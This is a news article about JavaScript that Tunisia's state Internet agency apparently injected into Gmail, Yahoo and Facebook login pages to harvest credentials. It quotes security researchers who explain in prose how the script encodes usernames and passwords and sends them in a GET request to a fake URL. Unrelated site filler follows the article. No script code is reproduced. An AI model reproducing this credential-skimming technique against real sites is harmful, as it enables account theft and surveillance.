Tunisian government harvesting usernames and passwords

The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is being blamed for the presence of injected JavaScript that captures usernames and passwords. The code has been discovered on login pages for Gmail, Yahoo, and Facebook, and said to be the reason for the recent rash of account hijackings reported by Tunisian protesters.

ATI is run by the Tunisian Ministry of Communications. They supply all of the privately held Tunisian ISPs, making them the main source of Internet access in the country. They’ve been under scrutiny for years, due to the fact that they make use of their authority to regulate the entire national network. Last April, ATI earned international attention by blocking access to sites such as Flickr, YouTube, and Vimeo.

According to Reporters Without Borders, authorities claim to target only pornographic or terrorist websites. “However, censorship applies above all to political opposition, independent news, and human rights websites.”

“When an Internet user attempts to access a prohibited website, the following automatic error message appears: “Error 404: page not found,” without displaying the familiar “Error 403” more typical of a blocked site...This strategy equates to a disguised form of censorship.”

As for the JavaScript itself, The Tech Herald has seen examples of the embedded script during live surfing sessions with sources in Tunisia, and in posted source code made available to the Web. The source for the GMail injection is here, the Yahoo injection is here, and Facebook is here.

Four different experts consulted by The Tech Herald independently confirmed our thoughts; the embedded code is siphoning off login credentials.

On Twitter, security researcher Gerry Kavanagh and Errata Security CTO David Maynor told us that you can tell the code is capturing login information by how it references the login element for the form.

“Suffice to say, the code is definitely doing something surreptitious,” Kavanagh noted.

Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s Josh Abraham, broke the code down further. Crowley explained that the JavaScript is customized for each site’s login form. It will pull the username and password, and encode it with a weak crypto algorithm.

The newly encrypted data is placed into the URL, and a randomly generated five character key is added. The randomly generated key is meaningless, but it is assumed that it’s there to add a false sense of legitimacy to the URL.

The random characters and encrypted user information are delivered in the form of a GET request to a non working URL. In the Gmail example, you see this URL listed as http://www.google.com/wo0dh3ad. Abraham noted that the encryption makes it easy to capture usernames and passwords that would include special characters such as ‘%’ or ‘/’.

Considering that the backbone of the Tunisian Internet is full of state run filters and firewalls designed to block access, configuring one to log the GET commands with the harvested data would be trivial. But is this a government sponsored action?

The likelihood that a group of criminals compromised the entire Tunisian infrastructure is virtually nonexistent. Code planting on this scale could only originate form an ISP. With their history of holding an iron grip on the Internet, ATI is the logical source of the information harvesting.

There is an upside however, as the embedded JavaScript only appears when one of the sites is accessed with HTTP instead of HTTPS. In each test case, we were able to confirm that Gmail and Yahoo were only compromised when HTTP was used. For Facebook on the other hand, the default is access is HTTP, so users in Tunisia will need to visit the HTTPS address manually.

Another interesting note is that it appears the embedded code has targeted Tunisian users for several months. Slim Amamou, of the Global Voices Advocacy blog, reported his findings on the code last July, and at the time, ATI was blocking Google’s HTTPS port, forcing users to default to HTTP.

The information surrounding the embedded JavaScript came to our attention thanks to a user on the IRC server where supporters for Anonymous’ Operation: Tunisia gathered to show support for Tunisian protesters. When word spread of embedded code and account hijackings, Anonymous offered Tunisian users help via Userscripts.org, with a browser add-on that strips the added JavaScript code.

The ATI website has been offline for more than a day. The outage started after Anonymous launched Operation: Tunisia. Our coverage on their actions and the problems in Tunisia is here.

Like this article? Please share on Facebook and give The Tech Herald a Like too!

From our Other Sites

McLaren 675LT Pictures

Some great shots of the forthcoming McLaren 675LT. This coupe will get you to 60mph in less than 2.9 second and go all the way to 205mph.

McLaren 675LT Details

McLaren’s 675LT will debut at this year’s Geneva show and promises some eye-popping performance. The coupe only 675LT has a 3.8 liter V8 that will get you from 0-60mph in less than 2.9 seconds and to 124mph in less than 7.9 secondsMore than a third of the parts have been changed compared with its stable mate […]

Octopus hunts on land, grabs crab (Video)

This crab is minding its own business searching the rock pools for food when suddenly an octopus leaps out of the water and grabs it. The amazing thing is that the octopus does not just jump on the crab it actually pulls it all the way back to the rock pool it came from. If you check the second video you will see it is not unknown for octopus to come out of the water and the one in the second video has a crab with it, though is not hunting one! Octopus Walks on Land at Fitzgerald Marine Reserve The video was taken by Porsche Indrisie in Yallingup, Western […]

Stunning Mars Rover Selfie

This image by the Curiosity Mars rover is not exactly your typical selfie. It is made up of a bunch of images taken by the rover during January 2015 by the Mars Hand Lens Imager. This (MAHLI) camera is at the end of the robot’s arm. For a sense of scale the rover’s wheels are about 20 inches diameter and 16 inches wide. Check the annotated image below for more information on the surroundings. Also if you really want to see some detail click this very large image, 36mb, at NASA.  

How the Sahara Helps Feed the Amazon (Video)

Sahara to Amazon
This cool video from NASA shows how dust is transferred across the Atlantic to the Amazon rainforest and helps nourish the plants growing there. For the first time scientists have measured the amount of dust and the amount of phosphorus in the dust. The later acts like a fertiliser and helps replenish the phosphorus the rainforest loses each year, around 22,000 tons. Amazing how something we perceive as being desolate like a desert actually has an important role in sustaining somewhere we see as teeming with life. Image and video from NASA’s Goddard Space Flight Center.

Bouncing Laser Guided Bomb (Video)

This amazing video shows a laser guided bomb bouncing back up after hitting its target. We actually think this is a non-explosive bomb designed to test guidance systems but it is still pretty remarkable and somewhat scary.

South Koreans Swallowed by Sinkhole (Video)

Thankfully the couple survived their adventure.
This amazing footage taken from the CCTV on a passing bus shows the moment two pedestrians in South Korea fall down a sinkhole in the street! Rescue workers managed to save the pair, who were treated in a nearby hospital for minor injuries. According to reports the city authorities and the Korean Geotechnical Society are looking into the cause.

Cheetah Pictures

Some Cool Cheetah Pictures Cheetahs are found mainly in Africa but also some parts of the Middle East. These sleek animals are the fastest land mammals in the world and can hit 60 mph in about 3 seconds, though they cannot maintain this speed for long. Cheetahs prey mostly on antelopes and smaller mammals but occasionally go for something bigger. We hope you enjoy these photos and don’t forget to check out the other speedy land mammals on our list of the fastest.

Sherlock Holmes Quiz

Sherlock Holmes
Sherlock Holmes was a man who absorbed information like a sponge and had a razor sharp mind. How much do you know about the famous fictional detective from the books?

22 years without Ferruccio Lamborghini

Lamborghini posted this photo today saying: “22 years without Ferruccio Lamborghini.” Ferruccio passed away on February 20th 1993 aged 76. Interestingly he started out making tractors!